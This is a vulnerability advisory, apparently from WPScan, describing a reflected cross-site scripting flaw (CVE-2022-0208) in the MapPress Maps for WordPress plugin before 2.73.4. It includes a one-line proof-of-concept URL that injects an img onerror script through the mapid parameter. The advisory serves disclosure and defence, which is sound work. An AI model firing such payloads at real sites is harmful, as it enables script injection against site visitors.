WordPress Plugin Vulnerabilities

MapPress Maps for WordPress < 2.73.4 - Reflected Cross-Site scripting

Description

The plugin does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(/XSS/)%3E

Affects Plugins

mappress-google-maps-for-wordpress

Fixed in version 2.73.4

References

CVE

CVE-2022-0208

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

59a2abd0-4aee-47aa-ad3a-865f624fa0fc

Timeline

Publicly Published

2022-01-17 (about 8 months ago)

Added

2022-01-17 (about 8 months ago)

Last Updated

2022-04-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin